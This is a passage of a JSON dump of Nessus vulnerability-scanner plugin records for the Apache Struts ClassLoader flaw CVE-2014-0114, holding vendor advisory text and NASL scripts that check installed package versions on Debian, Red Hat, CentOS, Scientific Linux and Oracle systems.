package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libstruts1.2-java\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libstruts1.2-java\", reference:\"1.2.9-4+deb6u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:54", "description": "It was found that the Struts 1 ActionForm object allowed access to the 'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. This could lead to remote code execution under certain conditions. (CVE-2014-0114)\n\nAll running applications using struts must be restarted for this update to take effect.", "cvss3": {}, "published": "2014-05-08T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : struts on SL5.x i386/x86_64 (20140507)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:struts", "p-cpe:/a:fermilab:scientific_linux:struts-debuginfo", "p-cpe:/a:fermilab:scientific_linux:struts-javadoc", "p-cpe:/a:fermilab:scientific_linux:struts-manual", "p-cpe:/a:fermilab:scientific_linux:struts-webapps-tomcat5", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20140507_STRUTS_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/73907", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73907);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0114\");\n\n script_name(english:\"Scientific Linux Security Update : struts on SL5.x i386/x86_64 (20140507)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader\nused by an application server running Struts 1. This could lead to\nremote code execution under certain conditions. (CVE-2014-0114)\n\nAll running applications using struts must be restarted for this\nupdate to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1405&L=scientific-linux-errata&T=0&P=186\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8c79ae99\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:struts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:struts-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:struts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:struts-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:struts-webapps-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"struts-1.2.9-4jpp.8.el5_10\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"struts-debuginfo-1.2.9-4jpp.8.el5_10\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"struts-javadoc-1.2.9-4jpp.8.el5_10\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"struts-manual-1.2.9-4jpp.8.el5_10\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"struts / struts-debuginfo / struts-javadoc / struts-manual / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:42", "description": "Updated struts packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nApache Struts is a framework for building web applications with Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the 'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. This could lead to remote code execution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using struts must be restarted for this update to take effect.", "cvss3": {}, "published": "2014-05-07T00:00:00", "type": "nessus", "title": "RHEL 5 : struts (RHSA-2014:0474)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:struts", "p-cpe:/a:redhat:enterprise_linux:struts-debuginfo", "p-cpe:/a:redhat:enterprise_linux:struts-javadoc", "p-cpe:/a:redhat:enterprise_linux:struts-manual", "p-cpe:/a:redhat:enterprise_linux:struts-webapps-tomcat5", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2014-0474.NASL", "href": "https://www.tenable.com/plugins/nessus/73901", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0474. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73901);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0114\");\n script_bugtraq_id(67121);\n script_xref(name:\"RHSA\", value:\"2014:0474\");\n\n script_name(english:\"RHEL 5 : struts (RHSA-2014:0474)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated struts packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nApache Struts is a framework for building web applications with Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader\nused by an application server running Struts 1. This could lead to\nremote code execution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. All running\napplications using struts must be restarted for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0474\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0114\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:struts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:struts-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:struts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:struts-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:struts-webapps-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0474\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"struts-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"struts-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"struts-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"struts-debuginfo-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"struts-debuginfo-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"struts-debuginfo-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"struts-javadoc-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"struts-javadoc-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"struts-javadoc-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"struts-manual-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"struts-manual-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"struts-manual-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"struts / struts-debuginfo / struts-javadoc / struts-manual / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:57", "description": "Updated struts packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nApache Struts is a framework for building web applications with Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the 'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. This could lead to remote code execution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using struts must be restarted for this update to take effect.", "cvss3": {}, "published": "2014-05-09T00:00:00", "type": "nessus", "title": "CentOS 5 : struts (CESA-2014:0474)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:struts", "p-cpe:/a:centos:centos:struts-javadoc", "p-cpe:/a:centos:centos:struts-manual", "p-cpe:/a:centos:centos:struts-webapps-tomcat5", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2014-0474.NASL", "href": "https://www.tenable.com/plugins/nessus/73922", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0474 and \n# CentOS Errata and Security Advisory 2014:0474 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73922);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-0114\");\n script_bugtraq_id(67121);\n script_xref(name:\"RHSA\", value:\"2014:0474\");\n\n script_name(english:\"CentOS 5 : struts (CESA-2014:0474)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated struts packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nApache Struts is a framework for building web applications with Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader\nused by an application server running Struts 1. This could lead to\nremote code execution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. All running\napplications using struts must be restarted for this update to take\neffect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-May/020284.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4770c1cd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected struts packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0114\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:struts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:struts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:struts-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:struts-webapps-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"struts-1.2.9-4jpp.8.el5_10\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"struts-javadoc-1.2.9-4jpp.8.el5_10\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"struts-manual-1.2.9-4jpp.8.el5_10\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"struts / struts-javadoc / struts-manual / struts-webapps-tomcat5\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:05", "description": "The remote Oracle Adaptive Access Manager installation is missing a vendor supplied update that fixes a flaw in Apache Struts which allows remote attackers to execute arbitrary code.", "cvss3": {}, "published": "2014-10-28T00:00:00", "type": "nessus", "title": "Oracle Adaptive Access Manager Server Arbitrary Code Execution (October 2014 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_OAAM_CPU_OCT_2014.NASL", "href": "https://www.tenable.com/plugins/nessus/78700", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78700);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-0114\");\n script_bugtraq_id(67121);\n\n script_name(english:\"Oracle Adaptive Access Manager Server Arbitrary Code Execution (October 2014 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Adaptive Access Manager installation is missing a\nvendor supplied update that fixes a flaw in Apache Struts which allows\nremote attackers to execute arbitrary code.\");\n # https://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ada40cc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2014 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"oracle_adaptive_access_manager_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Adaptive Access Manager\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"oracle_rdbms_cpu_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nproduct = \"Oracle Adaptive Access Manager\";\ninstall = get_single_install(app_name:product, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\n\nfixed = NULL;\npatch = NULL;\nreport = NULL;\n\nif (version =~ \"^11\\.1\\.1\\.5(\\.|$)\")\n fixed = \"11.1.1.5.3\";\nelse if (version =~ \"^11\\.1\\.1\\.7(\\.0|$)\")\n patch = '19768130';\nelse if (version =~ \"^11\\.1\\.2\\.1(\\.|$)\")\n fixed = \"11.1.2.1.3\";\nelse if (version =~ \"^11\\.1\\.2\\.2(\\.|$)\")\n fixed = \"11.1.2.2.1\";\n\nif (!isnull(patch))\n{\n patches = find_patches_in_ohomes(ohomes:make_list(path));\n\n vuln = TRUE;\n if (!empty_or_null(patches))\n if (!isnull(patches[path][patch])) vuln = FALSE;\n\n if (vuln)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Required patch : ' + patch +\n '\\n';\n }\n}\nelse if (!isnull(fixed))\n{\n if (ver_compare(ver:version, fix:fixed, strict:FALSE) < 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n }\n}\n\nif (isnull(report)) audit(AUDIT_INST_PATH_NOT_VULN, product, version, path);\n\nif (report_verbosity > 0) security_hole(port:0, extra:report);\nelse security_hole(port:0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:42", "description": "From Red Hat Security Advisory 2014:0474 :\n\nUpdated struts packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nApache Struts is a framework for building web applications with Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to 